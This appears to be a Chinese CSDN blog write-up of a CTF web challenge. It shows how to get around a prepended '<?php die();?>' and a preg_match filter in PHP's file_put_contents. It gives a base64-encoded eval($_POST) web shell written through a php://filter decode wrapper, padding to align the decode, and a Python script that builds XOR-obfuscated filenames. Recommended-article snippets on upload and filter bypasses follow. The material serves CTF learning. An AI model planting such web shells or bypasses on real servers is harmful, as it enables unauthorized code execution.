file_put_contents 绕过$contents=“<?php die();?>“.$contents,preg_match

最新推荐文章于 2023-08-16 19:14:17 发布
最新推荐文章于 2023-08-16 19:14:17 发布
阅读量2k 收藏 9
点赞数 3
文章标签: web 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feiniaotjx/article/details/121288676
版权

绕过<?php die();?>,preg_match

大概意思是传文件名和文件内容,但是两个参数都要经过waf函数过滤,并且文件内容开头加了<?php die();?>,它的意思是直接结束了php语句的执行,相当与exit()退出执行函数,故导致写入php文件的函数无法执行在这里插入图片描述所以我们需要让<?php die()?>不能执行,故可以使用php伪协议写入文件,
利用php://filter/convert.base64-decode/resource=5.php写入文件,
$contents=<?php @eval($_POST['123']);?>的内容使用base64加密
$contents=PD9waHAgQGV2YWwoJF9QT1NUWycxMjMnXSk7Pz4=,

因为base64解密为4字节为一组,并且base64编码中只包含64个可打印字符。其他的字符都将被忽略掉,故<?php die()>会变成phpdie,因此需在后面加两个字节变成8个字节,
所以payload为$contents=aaPD9waHAgQGV2YWwoJF9QT1NUWycxMjMnXSk7Pz4=

前面提到preg_match过滤了相关字符,我们可以使用异或绕过

char = "!@#$%^&*()_+|}{][\-=<>?/.,';qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM1234567890"
cmd = 'php://filter/convert.base64-decode/resource=5.php'
tmp1,tmp2 = '',''
for res in cmd:
    for i in char:
        for j in char:
            if(ord(i)^ord(j) == ord(res)):
                tmp1 += i
                tmp2 += j
                break
        else:
            continue
        break
print(tmp1,tmp2)

得到file的payload并用尖括号连接
(!!!@@@!!!!!!@!!!!!!!@!!!!@@@!!!!!!@!!!!!!!!@@@!!! )^(QIQzooGHMUDSoBNOWDSUnC@RDvtmEDBNEDoSDRNTSBD}unQIQ)
在这里插入图片描述访问5.php,连接shell得到flag
在这里插入图片描述还可以使用rot13编码等,这里推荐一下https://blog.csdn.net/woshilnp/article/details/117266628的文章

F。N 嘿嘿
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PHP中危险的file_put_contents函数详解
12-19
前言 最近在EIS上遇到一道文件上传的题,发现过滤了<,这样基本很多姿势都无效了,想了很久没做出来这题,赛后才知道是利用数组来绕过, 这里分析了下原理,话不多说了,来一起看看详细的介绍吧。 来看下file_put_contents函数第二个参数data的官网定义: data 要写入的数据。类型可以是 string,array 或者是 stream 资源(如上面所说的那样)。 如果 data 指定为 stream 资源,这里 stream 中所保存的缓存数据将被写入到指定文件中,这种用法就相似于使用 stream_copy_to_stream() 函数。 参数 data 可以是数组(但不能为多
php file_get_contents取文件中数组元素的方法
01-21
file_get_contents()抓取了 这个网址上的内容 http://simonfenci.sinaapp.com/index.php?key=simon&wd=1314abc 看似好像反回的是数组。。但是我不管怎么用foreach循环都报错。。 我只想把数组中的word里面...
php-filter的进阶利用
unexpectedthing的博客
10-09 707
文章目录前言php://filterfilter绕过死亡die,死亡之exitphp://inputzip://,bzip2://,zlib://data协议总结 前言 本文重点是在php://filter协议中,其他协议只是回忆下 php://filter php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件 函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有
文件上传漏洞及绕过检测的方式
热门推荐
seek_2022的博客
05-07 1万+
文章目录一、什么是文件上传漏洞?二、目标会对文件上传做哪些防护?(一)客户端检测(二)服务端检测(三)白名单和黑名单的区别三、绕过后端黑名单检测(一)换一个后缀名绕过黑名单检测(二)用.htaccess文件巧妙绕过黑名单(三)用大小写绕过后缀名检测(四)文件后缀加空格或点绕过后缀名检测(五)构造文件后缀绕过后缀名检测(六)双写绕过后缀名检测(七)Windows文件流绕过后缀名检测四、绕过白名单检测(一)%00截断和00截断(二)绕过Content-Type检测(三)用图片木马绕过白名单检测(四)用gif文件
php异或绕过
weixin_53146913的博客
04-19 615
进行命令执行的函数基本都被过滤了,所以我们可以使用scandir(),var_dump(),readfile(),print_r()等函数查看目录,并获取flag,先获取看目录下的文件,通过print_r(scandir(.))输出当前目录下的内容,同样使用取反绕过。flag文件在最后,可以使用end直接将指针执行最后一个文件,然后读取,使用readfile(end(scandir(.));但是使用了16 >13种,所以这里的做法是,选取已有的13种,再生成另外的3种,从而绕过过滤。
[羊城杯 2020]EasySer
Sk1y的博客
09-18 448
知识点:pop链,写入木马,蚁剑连接
php特性1--ctfshow
unexpectedthing的博客
11-01 648
文章目录1.数组绕过正则表达式web892.intvalweb90,92,93,94,953.正则表达式修饰符web91利用回溯最大次数绕过正则表达式4.路径问题web965.md5绕过强类型比较弱类型比较md5碰撞第四种情况其他的hash值(md4,CRC32)web976.三目运算符web987.变量覆盖前言$$使用不当extract()函数使用不当parse_str()函数使用不当import_request_variables()使用不当8.对preg_replace的研究9.in_array的特性
解决file_get_contents无法请求https连接的方法
10-26
PHP编程中,`file_get_contents` 是一个非常实用的函数,可以用来读取本地或远程文件内容。然而,当尝试使用 `file_get_contents` 函数读取HTTPS(安全的HTTP)连接时,可能会遇到一些问题。这主要是由于PHP默认...
php file_get_contents函数轻松采集html数据
12-18
$html = file_get_contents($page,’r’); $pattern=”/<B>全国主要城市、县当天和未来五天天气趋势预报在线查询<\/B>(.*?)<center xss=removed>/si”; //正则匹配之间的html preg_match($pattern,$html...
preg-match绕过.txtpreg-match绕过.txtpreg-match绕过.txtpreg-match绕过.txt
最新发布
05-19
preg_match绕过
php小经验:解析preg_match与preg_match_all 函数
10-27
本篇文章是对php中的preg_match函数与preg_match_all函数进行了详细的分析介绍,需要的朋友参考下
文件上传绕过
全栈菜鸟的博客
11-15 365
绕过 .htacess文件绕过 分布式配置文件,提供了针对目录改变配置的方法。 在一个特定的文档目录中放置一个包含一个或多个指令的文件,以此作用于此目录及其所有子目录。 功能:文件夹密码保护、用户自定义重定向、自定义404页面、扩展名伪静态化、禁止特定IP地址的用户… (.htaccess默认时不开启的,但假如使用了这些功能,就开启了) 使用方法: 制作一个.htaccess文件,添加代码:AddTyep application/x-httpd-php .png,使本目录下web容器将.png文件当做php
php特性绕过
None安全团队
08-03 1045
preg_match() 函数无法处理数组 导致被绕过 payload: ?num[]=1 1 2 3 4 5 6 7 8 9 10 11 12 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!");
几种方法绕过防注入
eldn__的专栏
11-20 4593
几种方法绕过防注入 当阿D和明小子派不上用场时,当你遇到有防注入程序的网站时,当你为次彷徨时,你是否想起运用手工绕过防注入的方法来拿站呢,不管成功与否,这是思路上的 突破,既锻炼了我们的能力也丰富了我们的经验。下面笔者针对网上出现的绕过防注入的方法结合自己的实践经验做出总结,与大家一起探讨防注入问题 1、运用编码技术绕过 如URLEncode编码,ASCII编码绕过。 例如or 1=1即
CTFSHOW WEB入门 文件包含 web78-
sinat_41572027的博客
07-11 810
CTFSHOW WEB入门 文件包含 web78.79.80.81.87.88.116.117
PHP之Base64+php://filter绕过、disabled_function绕过
求大佬师傅带
08-16 800
PHP之Base64+php://filter绕过、disabled_function绕过
命令执行各种绕过总结
m0_64815693的博客
10-11 8605
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
<?php $allow_ext = array('png','jpg','gif'); $file = $_FILES['file']['name']; $file_info = pathinfo($file); var_dump($file_info); $file_ext = $file_info['extension']; if(!in_array($file_ext, $allow_ext)){ exit("error extension"); } $news = time(); $filepath = './uploads/'; $newname = md5(md5($news)).'.'.$file_ext; $tmp_name=$_FILES['file']['tmp_name']; $filename=$filepath.$newname; if(move_uploaded_file($tmp_name,$filename)) { $content = file_get_contents($filename); $content = preg_replace('/<\?php|\?>/i', '_', $content); $content = preg_replace('/php/i', '', $content); $content = preg_replace('/eval/i', '_', $content); $content = preg_replace('/assert/i', '_', $content); $content = preg_replace('/ev/i', '_', $content); $content = preg_replace('/system/i', '_', $content); $content = preg_replace('/as/i', '_', $content); $content = preg_replace('/call/i', '_', $content); $content = preg_replace('/replace/i', '_', $content); $content = preg_replace('/func/i', '_', $content); file_put_contents($filename, $content); $data['success'] = 1; $data['message'] = '成功'; $data['url'] = $filename; }else{ $data['message']='ä¸Šä¼ å¤±è´¥!'; } echo json_encode($data); ?>
07-12
然后,它使用 `move_uploaded_file()` 函数将临时文件移动到指定的路径中。接下来,它会读取上传文件的内容,并使用一系列正则表达式替换操作来过滤一些敏感关键词(如 PHP 标签、eval、assert 等),并将过滤后的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值